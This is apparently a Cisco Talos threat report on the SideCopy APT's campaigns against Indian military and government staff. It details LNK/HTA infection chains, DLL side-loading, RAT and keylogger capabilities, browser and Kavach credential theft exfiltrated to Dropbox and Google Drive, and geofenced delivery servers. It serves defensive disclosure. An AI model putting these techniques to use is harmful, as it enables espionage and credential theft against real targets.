# InSideCopy: How this APT continues to evolve its arsenal ----- ## S deCopy How this APT continues to evolve its arsenal ### CONTENTS **Summary...................................................................................................................................................................................... 3** **What’s new?................................................................................................................................................................................ 3** **How did it work?.......................................................................................................................................................................... 3** **So what?...................................................................................................................................................................................... 3** **Background.................................................................................................................................................................................. 4** Early infection chain............................................................................................................................................................... 4 Latest CetaRAT infection chains............................................................................................................................................. 4 njRAT infections..................................................................................................................................................................... 7 MSI-based infection chain...................................................................................................................................................... 7 **Malicious payloads...................................................................................................................................................................... 8** RATs....................................................................................................................................................................................... 8 Plugins.................................................................................................................................................................................... 9 **RAT analysis................................................................................................................................................................................. 9** CetaRAT................................................................................................................................................................................. 9 DetaRAT............................................................................................................................................................................... 10 ReverseRAT.......................................................................................................................................................................... 11 MargulasRAT........................................................................................................................................................................ 11 Allakore................................................................................................................................................................................ 12 ActionRAT............................................................................................................................................................................ 12 Lilith...................................................................................................................................................................................... 13 Epicenter RAT....................................................................................................................................................................... 14 **Plugin analysis........................................................................................................................................................................... 14** Files manager....................................................................................................................................................................... 14 Browser credential stealer.................................................................................................................................................... 16 Keyloggers........................................................................................................................................................................... 17 Golang malware — Nodachi.................................................................................................................................................. 17 **Tracking and delivery infrastructure........................................................................................................................................ 19** **Observations and analyses....................................................................................................................................................... 20** Targeting.............................................................................................................................................................................. 20 Credential Harvesting........................................................................................................................................................... 22 **Conclusion................................................................................................................................................................................. 23** **Coverage................................................................................................................................................................................... 23** ----- ## S deCopy How this APT continues to evolve its arsenal ### SUMMARY ###### • Cisco Talos is tracking an increase in the SideCopy APT's activities targeting government ##### personnel in India using themes and tactics similar to APT36 (aka Mythic Leopard and Transparent Tribe). ###### • SideCopy is an APT group that mimics the Sidewinder APT’s infection chains to deliver their ##### own set of malware. ###### • We’ve discovered multiple infection chains delivering bespoke and commodity remote access ##### trojans (RATs) such as CetaRAT, Allakore and njRAT. ###### • Apart from the three known malware families utilized by SideCopy, Talos also discovered the usage ##### of four new custom RAT families and two other commodity RATs known as “Lilith” and “Epicenter.” ###### • Post-infection activities by SideCopy consist of deploying a variety of plugins, ranging from file ##### enumerators to credential-stealers and keyloggers. ### WHAT’S NEW? Cisco Talos has observed an expansion in the activity of SideCopy malware campaigns, targeting entities in India. In the past, the attackers have used malicious LNK files and documents to distribute their staple C#-based RAT. We are calling this malware “CetaRAT.” SideCopy also relies heavily on the use of Allakore RAT, a publicly available Delphibased RAT. Recent activity from the group, however, signals a boost in their development operations. Talos has discovered multiple new RAT families and plugins currently used in SideCopy infection chains. Targeting tactics and themes observed in SideCopy campaigns indicate a high degree of similarity to the Transparent Tribe APT (aka APT36) also targeting India. These include using decoys posing as operational documents belonging to the military and think tanks and honeytrap-based infections. ### HOW DID IT WORK? SideCopy’s infection chains have remained relatively consistent with minor variations — using malicious LNK files as entry points, followed by a convoluted infection chain involving multiple HTAs and loader DLLs to deliver the final payloads. Talos also discovered the usage of other new RATs and plugins. These include DetaRAT, ReverseRAT, MargulasRAT and ActionRAT. We’ve also discovered the use of commodity RATs such as njRAT, Lilith and Epicenter by this group since as early as 2019. Successful infection of a victim results in the installation of independent plugins to serve specific purposes such as file enumeration, browser password stealing and keylogging. ### SO WHAT? These campaigns provide insights into the adversary’s operations: ###### • Their preliminary infection chains involve delivering their staple RATs. ###### • Successful infection of a victim leads to the introduction of a variety of modular plugins. ###### • Development of new RAT malware is an indication that this group of attackers are rapidly evolving their malware arsenal and post-infection tools since 2019. ###### • Their current infrastructure setup indicates a special interest in victims in Pakistan and India. ----- ## S deCopy How this APT continues to evolve its arsenal ### BACKGROUND SideCopy campaigns use tactics and techniques that mimic the SideWinder APT group to deploy their own set of malware. For instance, this group actively utilizes artifact names and infection vectors identical to the Sidewinder group. SideCopy infection chains primarily consist of archive files containing malicious LNK files delivered to the victims. The filenames are meant to social engineer the victims into opening the LNK files, in turn, infecting them with SideCopy malware. What follows is a convoluted combination of malicious HTML Application files (HTA) and DOT NET-based loader DLLs that instrument CetaRAT and Allakore on the endpoints. **EARLY INFECTION CHAIN** The earliest discovered infection chain consisted of a LNK file that pulled down and executed an HTA from a remote _Figure 1: LNK with fake PDF icon executing remote HTA using mshta.exe._ location. This HTA would decode and instrument a loader DLL in memory to drop CetaRAT and another DLL (DUser. dll) (Figure 1). The dropped DLL is side-loaded into credwiz.exe. The DLL then executes CetaRAT on the infected endpoint, thereby completing the infection chain. The actors used this method in 2019 and have evolved it since then. This primitive infection chain doesn’t consist of decoy documents or images and is missing the Allakore RAT component (Figure 2). **LATEST CETARAT INFECTION CHAINS** Beginning 2020 and into 2021, we saw the attackers improve their infection chains. These infections also begin with malicious LNK files delivered to the victims. However, what follows is a combination of three HTA files, three loader DLLs, two instances of CetaRAT in some cases, and Allakore. This indicates an effort to modularize the attack chains, although it’s over-modularized in this case. _Figure 2: Primitive SideCopy infection chain._ ----- ## S deCopy How this APT continues to evolve its arsenal _Figure 3: Latest SideCopy infection chain._ _Figure 4: Latest SideCopy infection chain._ _Figure 3: Latest SideCopy infection chain._ The latest infection chains have also adopted the practice of displaying a decoy document (PDF) or image to the victims (Figure 3). **Stage No. 1 — LNK** The malicious LNK contains a command (Figure 4) to run a malicious HTA file hosted on an attacker-controlled website via mshta.exe. **Stage No. 2 — HTA** The malicious HTA file carries out the following activities: ###### • Creates a JavaScript file to restart the endpoint after the malicious HTA has completed the infection process. (The JavaScript waits for a specified time and restarts the system, enough for HTA to complete the infection.) ###### • Load and invoke a malicious Dot Net-based loader DLL (Stage 2A) into memory. **Stage No. 2A — Loader DLL** The malicious Dot Net-based loader DLL is responsible for: ###### • Decompressing a decoy PDF and displaying it to the victim on the endpoint. ###### • Downloads another malicious HTA (Stage No. 3A) from a remote URL and executes it on the endpoint. ----- ## S deCopy How this APT continues to evolve its arsenal ###### • Downloads and executes another malicious HTA file (Stage No. 4) from a remote URL. The decoy document displayed to the victim in this case is an internal Indian Ministry of Defense (MoD) circular related to their Human Resources Management System (HRMS) (Figure 5). **Stage No. 3 — Malicious HTA** This malicious HTA is similar to those seen previously (usually seen as Stage No. 2 in other infection chains). It is used to deploy the malicious CetaRAT embedded in the HTA file. In some cases, we’ve observed instances of this malicious HTA deploying two distinct CetaRAT payloads on the same endpoint, a deviation from the usual infection chain. **Stage No. 4 — Malicious HTA** This malicious HTA is similar to the HTA seen in Stage No. 3A of the attack chain. This HTA also: ###### • Loads another loader DLL into memory (Stage No. 4A). ###### • Collects AV product names and passes them to the loader DLL (Stage No. 4A) along with the credwiz.exe binary and DUser.dll malicious DLL to be side-loaded. **Stage No. 4A — Malicious loader DLL** This DLL is responsible for dropping DUser.dll (Stage No. 4B side-loaded into credwiz) into a variable location, depending on the presence of a specific anti-virus products installed on the endpoint: _Figure 5: Decoy PDF pretending to be an internal Indian Army document._ ###### • Kaspersky • QuickHeal • Avast ###### • Avira • Bitdefender • Windows Defender ----- ## S deCopy How this APT continues to evolve its arsenal _Figure 6: njRAT infection chain._ This loader DLL also persists Allakore RAT on the endpoint. The side-loaded DLL is then responsible for executing Allakore. **Stage No. 4B - Allakore** Allakore RAT is a publicly available Delphi-based RAT. It is usually called “Cyrus client” in SideCopy infection chains. Its capabilities include: ###### • Upload and download files. • Capture screenshots from the endpoint. • Enumerate directories and files. • Keylogging. • Steal current clipboard data. **NJRAT INFECTIONS** Another recently discovered infection chain (Figure 6) used by SideCopy completely abandons CetaRAT and Allakore and uses njRAT instead. This infection chain is simpler than the ones seen previously. A second variation of njRAT infection chain uses selfextracting RAR-based dropper executables that consists of: ###### • Malicious VB script to set up persistence for njRAT de­ ployed by the dropper. ###### • njRAT binary dropped and executed by the dropper. ###### • The decoy document is usually a PDF displayed to the victim. These PDFs mainly consist of themes related to the Indian Army and government. Some examples of the self-extracting dropper filenames: ###### • Indian Army Restructring And Re-Organiza­ ``` tion.pdf.exe • director_general_level_border_coordination_ conference.pdf.exe • Phase-3 of Nationwide Covid-19 Vaccination Registration.pdf.exe ``` **MSI-BASED INFECTION CHAIN** Around mid-2020, we observed a deviation from the LNKbased infection chain. In this case, the attackers hosted a malicious archive (ZIP) on an attacker-controlled website ``` freewindowssoftware[.]com. The ZIP file contained ``` an MSI file posing as an installer for the “Libre Video ``` Locker” application. On installation, the malicious MSI ``` would install Allakore RAT into the “Program Files\Libre ``` Software Corporation\LibreVideoLocker” folder ``` (Figure 7). The final payloads consisted of three components: ###### • Loader EXE: Executed first and masquerades as a Libre video player application. It is, however, meant to run Allakore and the malicious BAT file. ----- ## S deCopy How this APT continues to evolve its arsenal _Figure 7: MSI-based infection chain dropping Allakore._ _Figure 7: MSI-based infection chain dropping Allakore._ ###### • Persistence BAT file: Used to set up persistence for Allakore via the registry HKCU\..\Run key. ###### • Allakore RAT exe: This is a copy of the Allakore RAT built in 2019, instrumented to communicate with a known SideCopy C2 IP. ### MALICIOUS PAYLOADS This is an overview of the different final stages of infections. **RATS** SideCopy infections utilize a number of RATs. The RAT payloads discovered by Talos so far are: ###### • CetaRAT: SideCopy’s staple RAT first seen in the wild in 2019. This was already disclosed publicly. We are calling it “CetaRAT” to identify it throughout this research piece. ###### • DetaRAT — C#-based RAT: A previously unknown C#based RAT that contains several RAT capabilities similar to CetaRAT. ###### • ReverseRAT: Another previously undiscovered C# based reverse shell that also monitors removable drives. It is based on CetaRAT. ###### • MargulasRAT: This is another custom RAT used as part of SideCopy operations. The dropper for MargulasRAT masquerades as a VPN application from India’s National Informatics Centre (NIC). ###### • Allakore: Allakore is a Delphi-based RAT first observed in 2015. This RAT has been used by SideCopy extensively, along with CetaRAT. ###### • ActionRAT: ActionRAT is another Delphi-based RAT used in SideCopy’s operations. At first glance, it looks quite similar to Allakore but is distinct in its implementation. We also found a C#-based version of the RAT, indicating that the attackers have ported it to the Dot Net platform, as well. ###### • Lilith: Lilith is a C++-based RAT first observed in 2016. SideCopy used a customized version of Lilith in early 2019. Lilith has also been utilized by another APT named “TICK” in 2018 - 19. ###### • EpicenterRAT: Epicenter is another commodity RAT observed in the wild since 2012. SideCopy’s usage of Epicenter dates back to as early as 2018 - 19. ----- ## S deCopy How this APT continues to evolve its arsenal **PLUGINS** In addition to full-fledged RATs, SideCopy utilizes modular plugins to carry out specific malicious tasks on the infected endpoint: ###### • File manager: A file management component that can enumerate, download and upload files on the endpoint from/to the C2. ###### • Keyloggers: There are two keyloggers used by Side­ Copy. **○** **Xeytan: A publicly available C#-based keylogger** available since 2016. **○** **Lavao: Another C#-based keylogger.** ###### • Browser credential stealers: Again, there are two types of stealers used: **○** C-based stealer component to steal passwords from Firefox and Chrome. **○** C#-based stealer component to steal Chromium browser passwords. ###### • Nodachi: A previously unknown set of plugins uti­ lized by SideCopy we’re calling “Nodachi.” These Golang-based plugins have reconnaissance and file-stealing abilities targeting an Indian multi-factor authentication app known as “Kavach.” ### RAT ANALYSIS **CETARAT** CetaRAT is a C#-based RAT family first seen in the wild since 2019. Its malicious capabilities (Figure 8) include: ###### • Execution: Download and run arbitrary executables and commands. ###### • File management: Upload, download, delete, rename and enumerate files. ###### • Capture: Take screenshots and monitor clipboard data. ###### • Processes: List or kill processes on the endpoint. _Figure 8: CetaRAT command codes._ ----- ## S deCopy How this APT continues to evolve its arsenal **DETARAT** DetaRAT is a previously unknown C#-based implant used by SideCopy. This implant uses a different set of command codes (Figure 9) with a hardcoded key for communicating with its C2 servers. Its malicious capabilities include: ###### • Files management: Create, move, rename and delete directories and files. ###### • File enumeration: Retrieves detailed directory and file information recursively, including creation and last access times. ###### • Exfiltration and infiltration: Download and upload files from and to the C2. ###### • Audio: Record and upload audio files. ###### • Remote control: Control mouse cursor and clicks. ###### • Hosts file: Retrieve and send / etc/hosts file contents. ###### • Installed Software: Exfiltrate details of installed software from registry. ###### • Execution: Run arbitrary commands on the endpoint via cmd.exe. ###### • Clipboard: Get and set clipboard data. ###### • Sysinfo: The following informa­ tion is sent to the C2 to finger­ print the endpoint: **○** IP and MAC addresses. **○** Installed anti-virus software. **○** Processor and GPU info, RAM info, system uptime, OS details, battery charge and life. **○** Hostname, current username and screen dimensions. _Figure 9: DetaRAT command codes._ ----- ## S deCopy How this APT continues to evolve its arsenal **REVERSERAT** This is a simple C#-based malware that opens up a reverse shell (Figure 10) to its C2 server using cmd.exe. This reverse shell also has code built into it to monitor removable drive events (Figure 11), such as connection and removal. **MARGULASRAT** MargualsRAT is distributed via another C#-based dropper (Figure 12) binary. The dropper masquerades as the same VPN we mentioned previously. NIC is responsible for providing IT services, such as email and VPN access, to Indian government employees, including military personnel. Another variant of the dropper deploys MargulasRAT after displaying a decoy PDF to the victim (Figure 13). This infection chain uses VBScripts to persist MargulasRAT via registry, while the dropper downloads the RAT from a remote location (Figure 14). MargulasRAT (Figure 15) is limited in capabilities, but does include: ###### • Screenshot capture: Capture a screenshot of the reso­ lution specified by the C2, AES encrypt and send. ###### • Update self: Receives an encoded binary from C2, _Figure 10: ReverseRAT reverse shell._ _Figure 11: USB device insertion notifier code snippet._ _Figure 12: Dropper opening the decoy NIC VPN portal and setting_ _up persistence for MargulasRAT._ _Figure 13: Code used to download and display a decoy PDF_ _related to the Indian Army displayed to the victim followed by_ _activation of MargulasRAT._ ----- ## S deCopy How this APT continues to evolve its arsenal writes it on a disk, and executes it. Runs cmd.exe to terminate itself afterward. ###### • Download more payloads: Receives a name and encoded payload data from the C2, then write it to disk and execute it on the infected endpoint. ###### • Stop communications: Terminate communication session with the C2 until the next run. We’ve observed unimplemented command codes in the MargualsRAT indicating that this RAT is actively in development by the attackers. **ALLAKORE** Allakore is a publicly available Delphibased RAT that has consistently been used in SideCopy operations along with CetaRAT. Malicious capabilities of Allakore include: ###### • Keylogging. • Capture screenshots. • List folders and files. • Upload/Download files. • Steal clipboard data. • Grab/change wallpaper. In recent infections, this RAT is named “Cyrus client” (Figure 16). **ACTIONRAT** ActionRAT is a Delphi-based RAT containing a limited set of capabilities. This RAT also comes in a C# variant, indicating that the attackers have ported it to the Dot Net platform. This RAT typically uses two C2 URLs (Figure 17) — one for the initial checkin to confirm infections (beacon C2 URL) and the other to instrument the RAT and send/recv commands and output data. _Figure 14: Malicious VBScript used to persist MargulasRAT across reboots._ _Figure 15: Command handler of MargulasRAT._ _Figure 16: Allakore RAT with the name “Cyrus_Client.”_ ----- ## S deCopy How this APT continues to evolve its arsenal _Figure 17: Two C2 URLs used in ActionRAT._ Primary capabilities of the RAT include (Figures 18 and 19): ###### • Gather sysinfo: Collect the following information from the infected endpoint and sends the following informa­ tion to the C2 at the beginning of the RAT’s execution. **○** Computer name and username. **○** Installed anti-virus product names. **○** Operating system name, MAC address (used as in­ fection identifier) and architecture type (x86 or x64). ###### • Arbitrary command execution: Run arbitrary commands specified by the C2 on the endpoint. ###### • List drives: Collect drive names and total size for all drives present on the system and send them to the C2. ###### • Enumerate files: Enumerate files for a given directory on the endpoint and sends the following information to the C2: **○** Directory names and creation time. **○** Filepath, size and creation time. ###### • Download files: Download a file specified by the C2 to a location on disk. ###### • Download and execute: Download and then execute a file specified by the C2 on the endpoint. ###### • Upload files: Exfiltrate the contents of a specified file to the C2. **LILITH** Lilith is a commodity RAT available in the wild since 2016. The version of Lilith used in SideCopy operations consists of the following capabilities (Figure 20): ###### • Terminate or restart self. • Download and execute files from specified locations. • Enumerate files. • Reverse shell. _Figure 18: Command codes included in the Delphi version_ _of ActionRAT._ _Figure 19: C#-based ActionRAT’s command handler._ ----- ## S deCopy How this APT continues to evolve its arsenal _Figure 20: Command codes and handlers in Lilith._ _Figure 21: Epicenter command handler._ **EPICENTER RAT** Epicenter is a commodity RAT used by SideCopy since 2018. It contains a variety of capabilities (Figure 21) including: ###### • Gathering system information. • Gather installed Antivirus product names. • Shutdown, reboot system or log the user off. • Block keyboard and mouse inputs to self. • Uninstall self. ###### • Enumerate, launch and kill processes. • Take screenshots. • Enumerate directories, delete files and folders. • Check persistence status for self. ### PLUGIN ANALYSIS **FILES MANAGER** The files manager plugin used can scan all drives on the system recursively and record file paths to a log file named ----- ## S deCopy How this APT continues to evolve its arsenal “YYYYMMDDHHMMSS_di_output. txt” based on the current time (Figure 22). The file paths recorded must match the following extensions: ``` doc, ppt, xls, txt, pdf, zip, mdb, accdb, db, rar, jpg, bmp, gif, csv, bmp, docx, pptx, xlsx and png. ``` The files manager will also send preliminary system information to the C2 and receive a command code in return: ``` hname=&uname= &osname=&hid=&mcc= &avname=&arc= ``` Where: ###### • hname = computer name. • uname = username of currently logged in user. ###### • osname = Windows version name string. ###### • hid = hardware id i.e. a com­ bination of processor ID, serial number and disk signature ###### • mcc = Mac Address of the end­ point. ###### • avname = either “Defender”, “Avira” or “N/A” depending on whichever AV is found installed. ###### • arc = “x64” or “x86” **Command codes:** ###### • “filelist” and “updatefilelist”: Send recorded file paths from “YYYYMMDDHHMMSS_di_output. txt” to C2 server. ###### • “download|”: Read contents of file path specified by C2 and exfiltrate. _Figure 22: Files manager command handler module._ ###### • “upload|”: Get specified file from C2 and write to specified location on disk. • “execute|”: Download a specific file to a location on a disk specified by the C2 and execute it. SideCopy also uses a document copier (Figure 23). This component searches for files with specific extensions across removable and fixed drives and creates an encrypted copy for itself. The encrypted copy may be exfiltrated later by another component. So far, this component only searches for doc, docx, ppt, pptx and ``` pdf files. ``` ----- ## S deCopy How this APT continues to evolve its arsenal We’ve also found standalone implementations of the document copier (called “UPirate”). This consists of document copying and encryption capabilities without the C2 functionality of the file manager component. **BROWSER CREDENTIAL STEALER** We’ve observed two flavors of browser credential stealer components utilized by SideCopy (Figure 24). The first is a C-based stealer that targets Firefox and Chrome. The second credential stealer is C#-based and targets Chromium-based browsers, including: ###### • Chrome • AVG Browser • Kinza • URBrowser • AVAST Software • SalamWeb • CCleaner • Opera • Yandex • Slimjet • 360 Browser • Comodo Dragon • CoolNovo • Chromium | SRWare Iron Browser ###### • Torch Browser • Brave Browser • Iridium Browser • Opera Neon ###### • 7Star • Amigo • Blisk • CentBrowser • Chedot • CocCoc • Elements Browser • Epic Privacy Browser • Kometa • Orbitum • Sputnik • uCozMedia • Vivaldi • Sleipnir 6 • Citrio • Coowon • Liebao Browser • QIP Surf • Edge Chromium _Figure 23: Find and save encrypted copy of_ _file extensions specified._ _Figure 24: C-based browser credential stealer code for obtaining_ _Chrome login data._ ----- ## S deCopy How this APT continues to evolve its arsenal Credentials extracted from any of these browsers installed on the endpoint are then written to a temporary log file on disk and subsequently exfiltrated to a DropBox location (Figure 25). **KEYLOGGERS** SideCopy uses two dedicated keyloggers for recording keystrokes, the aforementioned Xeytan (Figure 26) and Lavao (Figure 27), which is a custom keylogger first seen around mid-2019 that records timestamps, Window names and pressed key codes into a log file. **GOLANG MALWARE — NODACHI** _Figure 25: Credentials exfiltrated using the DropBox upload API._ Cisco Talos also discovered a GoLang-based component we’re calling “Nodachi.” _Figure 26: Xeytan keystroke recorder used in SideCopy ops._ _Figure 27: Lavao keylogger collecting keystrokes_ _and window titles._ ----- ## S deCopy How this APT continues to evolve its arsenal Nodachi is meant for reconnaissance and stealing different types of data from the victim’s endpoint: ###### • Credential stealing: The malware uses the goLazagne library to steal the login credentials from the infected endpoint, such as internet browsers, credential managers and some sysadmin tools (Figure 28). Once the login credentials are obtained, it copies these files over to the attacker’s Google Drive. ###### • Steal ‘Kavach’ data: Kavach (hindi for “Armor”) is an authentication system used by the Govern­ ment of India’s (GoI) NIC agency. Kavach provides its users with an MFA application/client used for authentication of employees to access GoI’s IT infrastructure, such as email. The malware looks for the “kavach.db” database containing login credentials of us­ ers in the directory: ``` C:\Users\\ AppData\Roaming\kavach.db ``` If found, the file is copied to the attacker’s Google Drive (Figure 29). ###### • File lister: The GoLang malware uses the goLazagne library to lists all files with specific extensions on the endpoint: .docx, .doc, ``` .pptx, .xls and .xml. The files ``` found are logged into a file that is then exfiltrated again to the attackers via Google Drive APIs. One variant of Nodachi also dis­ played a decoy PDF downloaded from an attacker-owned Google Drive link. This decoy document is the same as the one seen in one of the latest CetaRAT infec­ tion chains (Figure 30). _Figure 28:_ _Credential_ _stealer_ _functionality._ _Figure 29: Look_ _for kavach.db_ _and open it._ _Figure 30: The_ _same decoy_ _document_ _from CetaRAT_ _infection chains_ _is downloaded_ _and displayed_ _by Nodachi._ _Uploaded to_ _Google Drive on_ _March 25, 2021._ ----- ## S deCopy How this APT continues to evolve its arsenal _Figure 31: Country check before serving a specific payload to the requester._ ### TRACKING AND DELIVERY INFRASTRUCTURE SideCopy’s delivery infrastructure consists of either setting up fake websites or using compromised websites to deliver malicious artifacts to specific victims. The delivery scripts verify that requests to receive artifacts/ payloads are from two specific geographies: India and Pakistan (Figure 31). If this matches, then a payload or decoy is served to the requester. All requests are logged to a log file on the delivery server to keep track of artifacts served to potential victims (Figure 32). _Figure 32: Victim logging_ _capability of delivery servers._ The data recorded in the log files consists of the following requester information: ###### • Source IP address. • Device type: tablet, mobile or computer. • Operating system name. • User-Agent string. • Architecture type: 32- or 64-bit. • Browser name. • Referrer value. • Timestamp of request. • City and country of origin. ----- ## S deCopy How this APT continues to evolve its arsenal ### OBSERVATIONS AND ANALYSES **TARGETING** SideCopy uses themes predominantly designed to target military personnel in the Indian subcontinent. Many of the LNK files and decoy documents used in their attacks pose as internal, operational documents of the Indian Army. One infection posed as a seniority list of the Indian Army as recently as early 2021 (Figure 33). Apart from military themes, SideCopy also utilized publications, calls for papers/proposals and job openings related to think tanks in India to target potential victims. In one of the infections, the attackers used a malicious LNK file to deliver Allakore and CetaRAT to its victims. This specific attack chain used a decoy document posing as an advertisement of a call for proposals for the Chair of Excellence 2021 for the Centre For Land and Warfare Studies (CLAWS) in India (Figure 34). Interestingly, the same theme was seen in another recent attack conducted by the Transparent Tribe APT to deliver ObliqueRAT payloads to their victims. In another instance, we observed the attackers using a decoy document consisting of an article published by the Centre for Joint Warfare Studies (CENJOWS) in India. The article is a Geo Strategic Scan from August 2020 discussing the political and economic implications of resuming diplomatic talks between the U.S. and China (Figure 34). _Figure 34: Decoy_ _document_ _masquerading_ _as a legitimate_ _CENJOWS article._ _Figure 33: Decoy document related to the Indian Army._ ----- ## S deCopy How this APT continues to evolve its arsenal More recently, an issue brief of the Observer Research Foundation (ORF, another independent think tank based out of India) was used as a decoy by SideCopy in an attack delivering njRAT to its victims (Figure 35). Another attack from 2020 shows targeting of diplomatic personnel — those working in embassies specifically. The decoy document employed in this case consisted of a circular from the Indian Ministry of External Affairs (MEA) to its employees and attachees. This infection chain also delivered Allakore and CetaRAT (Figure 36). Besides all of these email campaigns we’ve outlined, SideCopy also uses honeytraps to lure victims in. These infections typically consist of malicious LNK files that display explicit photos of women. The infection chain again delivers CetaRAT and Allakore. We’ve also observed APT36 (Transparent Tribe) use these types of honeytraps extensively in campaigns targeting members of India’s military with CrimsonRAT. Also like APT36, SideCopy clones legitimate websites that actually just serve malicious content. In the case of SideCopy, we discovered afghannewsnetwork[.] ``` com, a website posing as the ``` Pajhwok Afghan News, an Afghani independent news agency (Figure 37). This website was used as a C2 for actionRAT, delivered using malicious LNKs that used decoy documents that looked like professional resumes - another targeting tactic closely resembling APT36 (Transparent Tribe). _Figure 35: ORF decoy_ _document used in_ _njRAT infections._ _Figure 36: Ministry of_ _External Affairs Circular_ _decoy document._ ----- ## S deCopy How this APT continues to evolve its arsenal _Figure 37: (Left) malicious cloned website vs. (Right) Legitimate website for the Pajhwok Afghan News._ **CREDENTIAL HARVESTING** One of SideCopy’s central motives is credential harvesting. Specifically, the group looks to steal access credentials from central Indian government employees. The group commonly targets Kavach, an MFA app used across India’s government. Kavach allows employees (including military personnel) to access IT resources such as email services. SideCopy has shown a particular interest in Kavach, deploying the njRAT malware with special victim IDs of “kavach.” They also use GoLang-based file recon plugins (Nodachi) to exfiltrate Kavach authentication databases from infected devices. Some droppers for MargulasRAT also masqueraded as installers for Kavach on Windows. We’ve also discovered phishing portals operated by SideCopy posing as the GoI’s webmail to trick victims into divulging their email credentials (Figure 38). _Figure 38: Phishing portal for webmail[.]gov[.]in set up_ _by SideCopy._ ----- ## S deCopy How this APT continues to evolve its arsenal ### CONCLUSION ###### Product What started as a simple infection vector by SideCopy to deliver a custom RAT (CetaRAT), has evolved into multiple Cisco Secure Endpoint variants of infection chains delivering several RATs. The use (AMP for Endpoints) of these many infection techniques — ranging from LNK files Cloudlock to self-extracting RAR EXEs and MSI-based installers — is an indication that the actor is aggressively working to infect their Cisco Secure Email victims. This threat actor is also rapidly evolving their malware set using a combination of custom and commodity RATs and Cisco Secure Firewall/Secure IPS plugins. The variety of post-infection plugins specifically used (Network Security) by the attacker signifies a focus on espionage. Cisco Secure Network Analytics Targeting tactics used by SideCopy consists of multiple themes, (Stealthwatch) quite similar to those utilized by APT36: military, diplomatic and honeytraps. This indicates that the group continues to target Cisco Secure Cloud Analytics government entities in the Indian subcontinent. (Stealthwatch Cloud) This boost in SideCopy’s operations aided by multiple Cisco Secure Malware Analytics infection chains, RATs and plugins marks the group’s intent (Threat Grid) to rapidly evolve their TTPs. Umbrella ### COVERAGE Cisco Secure Web Appliance (Web Security Appliance) Ways our customers can detect and block this threat are listed below. Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here. Cisco Secure Web Appliance web scanning prevents access to malicious websites and detects malware used in these attacks. Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here. Cisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat. Cisco Secure Network/Cloud Analytics (Stealthwatch/ Stealthwatch Cloud) analyzes network traffic automatically and alerts users of potentially unwanted activity on every connected device. Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products. Umbrella, Cisco’s secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network. Sign up for a free trial of Umbrella here. Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them. Additional protections with context to your specific environment and threat data are available from the Firewall Management Center. Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network. Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org. SIDs 57842 - 57849 can protect against the threats outlined in this paper. Cisco Secure Endpoint users can use Orbital Advanced Search to run complex OSqueries to see if their endpoints are infected with this specific threat. -----